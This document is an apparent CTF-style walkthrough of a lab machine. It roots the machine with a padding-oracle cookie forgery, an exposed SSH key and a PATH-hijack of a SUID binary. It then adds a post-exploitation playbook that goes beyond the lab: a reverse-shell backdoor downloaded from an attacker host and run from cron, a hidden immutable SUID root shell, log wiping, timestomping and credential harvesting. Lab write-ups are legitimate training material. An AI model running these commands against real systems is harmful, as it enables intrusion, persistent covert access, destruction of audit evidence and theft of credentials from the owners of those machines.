Machine Synopsis
Key Exploitation Techniques:
- Padding Oracle Attack (AES-CBC session cookie manipulation)
- SSH key discovery via admin panel access
- SSH authentication bypass (
PubkeyAcceptedKeyTypes
) - SUID binary exploitation (PATH hijacking via unsafe external command execution)
Reconnaissance & Enumeration
Port Discovery
1
2
3
4
| $ nmap -sC -sV -A 10.10.10.18
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|
Web Application Analysis
The website hosts a “CompanyDev” portal with login and registration functionality. SQL injection tests against the login form show no direct vulnerabilities.
1
2
3
| # Test for SQL injection
$ sqlmap -r login_request.txt --batch
[CRITICAL] all tested parameters do not appear to be injectable.
|
Directory Enumeration
1
2
3
4
5
6
| $ gobuster dir -u http://10.10.10.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/images (Status: 301)
/index.php (Status: 200)
/login.php (Status: 200)
/register.php (Status: 200)
/logout.php (Status: 302)
|
Exploitation
Padding Oracle Discovery
Registration creates an auth
cookie. Modifying this cookie triggers “incorrect padding” errors, indicating a Padding Oracle vulnerability.
Cookie Analysis:
- Normal cookie:
IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs
- Modified cookie: Results in padding error
Padding Oracle Attack
Cookie Decryption
1
2
3
4
| # Decrypt existing auth cookie to understand format
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0
[+] Decrypted value (ASCII): user=shiro
|
Admin Cookie Creation
1
2
3
4
| # Encrypt new plaintext for admin access
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0 -plaintext user=admin
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
|
Admin Panel Access
Replace the browser session cookie with BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
to gain administrative access.
SSH Key Discovery
The admin dashboard contains a “My Key” link providing an RSA private key named mysshkeywithnamemitsos
.
1
2
3
| # Download SSH key
$ wget -O id_rsa http://10.10.10.18/mysshkeywithnamemitsos
$ chmod 600 id_rsa
|
SSH Authentication Bypass
1
2
3
4
5
6
7
| # Initial connection fails due to signature algorithm mismatch
$ ssh -i id_rsa mitsos@10.10.10.18
sign_and_send_pubkey: no mutual signature supported
# Bypass by accepting ssh-rsa key types
$ ssh -i id_rsa mitsos@10.10.10.18 -o PubkeyAcceptedKeyTypes=+ssh-rsa
mitsos@LazyClown:~$
|
Privilege Escalation
SUID Binary Discovery
1
2
| mitsos@LazyClown:~$ ls -la
-rwsrwsr-x 1 root root 7303 May 3 2017 backup
|
Binary Analysis
1
2
3
4
5
| mitsos@LazyClown:~$ ./backup
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4Os...
mitsos@LazyClown:~$ strings backup
cat /etc/shadow
|
Vulnerability: The binary calls cat
without full path, enabling PATH hijacking.
PATH Hijacking Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Modify PATH to prioritize /tmp
mitsos@LazyClown:~$ export PATH=/tmp:$PATH
# Create malicious cat script
mitsos@LazyClown:/tmp$ cat > cat << 'EOF'
#!/bin/sh
/bin/sh
EOF
mitsos@LazyClown:/tmp$ chmod +x cat
# Execute SUID binary to trigger malicious cat
mitsos@LazyClown:~$ ./backup
# whoami
root
# cat /root/root.txt
489332b5fb06c89a9618f082b1b107a2
|
Post-Exploitation Techniques
Persistence Methods
SSH Key Persistence
1
2
3
4
5
6
| # Generate new SSH key pair
$ ssh-keygen -t rsa -b 4096 -f lazy_persistence
# Add public key to root authorized_keys
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
|
Cron Backdoor
1
2
3
4
5
6
7
8
| # Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
$ python3 -m http.server 80
# Download and install on target
# wget 10.10.14.6/backdoor -O /tmp/.update
# chmod +x /tmp/.update
# echo "*/10 * * * * /tmp/.update" >> /etc/crontab
|
SUID Backdoor Maintenance
1
2
3
4
5
6
| # Create permanent SUID shell
# cp /bin/bash /tmp/.rootshell
# chmod 4755 /tmp/.rootshell
# Hide with file attributes
# chattr +i /tmp/.rootshell
|
Defense Evasion
Log Cleanup
1
2
3
4
5
6
7
8
9
| # Clear authentication logs
# > /var/log/auth.log
# > /var/log/secure
# > /var/log/wtmp
# > /var/log/lastlog
# Clear command history
# > /root/.bash_history
# > /home/mitsos/.bash_history
|
Artifact Timestomping
1
2
3
| # Match timestamps to system files
# touch -r /bin/ls /tmp/.rootshell
# touch -r /bin/cat /tmp/cat
|
Lateral Movement Preparation
Network Discovery
1
2
3
4
5
| # Scan local network
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done
# Port enumeration
# nmap -sT -p- --min-rate 5000 192.168.1.0/24
|
Credential Harvesting
1
2
3
4
5
6
7
8
| # Extract password hashes
# cat /etc/shadow > /tmp/shadow.txt
# Search for SSH keys
# find /home -name "*.pem" -o -name "id_*" 2>/dev/null
# Look for stored credentials
# grep -r "password\|pass" /home/*/.*config* 2>/dev/null
|
Service Enumeration
1
2
3
4
5
6
7
8
9
| # List network services
# netstat -tlnp
# Check for running databases
# ps aux | grep -E "(mysql|postgres|mongo)"
# Examine cron jobs
# cat /etc/crontab
# ls -la /etc/cron.*/*
|
Alternative Exploitation Methods
Manual Padding Oracle
1
2
3
4
5
6
7
8
9
10
| # Manual cookie manipulation for testing
$ python3 -c "
import requests
import base64
# Test various padding scenarios
cookie = 'IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs'
response = requests.get('http://10.10.10.18/index.php', cookies={'auth': cookie + 'A'})
print('Padding error detected' if 'padding' in response.text else 'No error')
"
|
Alternative SSH Access
1
2
| # Try different SSH configurations
$ ssh -i id_rsa mitsos@10.10.10.18 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null
|
Alternative Privilege Escalation
LinPEAS Enumeration
1
2
3
4
| # Transfer and run LinPEAS
mitsos@LazyClown:/tmp$ wget 10.10.14.6/linpeas.sh
mitsos@LazyClown:/tmp$ chmod +x linpeas.sh
mitsos@LazyClown:/tmp$ ./linpeas.sh
|
Kernel Exploitation
1
2
3
4
5
6
| # Check kernel version
mitsos@LazyClown:/tmp$ uname -a
Linux LazyClown 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64
# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege
|
Docker Escape (if applicable)
1
2
3
4
5
| # Check for Docker environment
mitsos@LazyClown:/tmp$ ls -la /.dockerenv 2>/dev/null && echo "Docker detected"
# Check for privileged containers
mitsos@LazyClown:/tmp$ cat /proc/self/status | grep -E "(CapInh|CapPrm|CapEff)"
|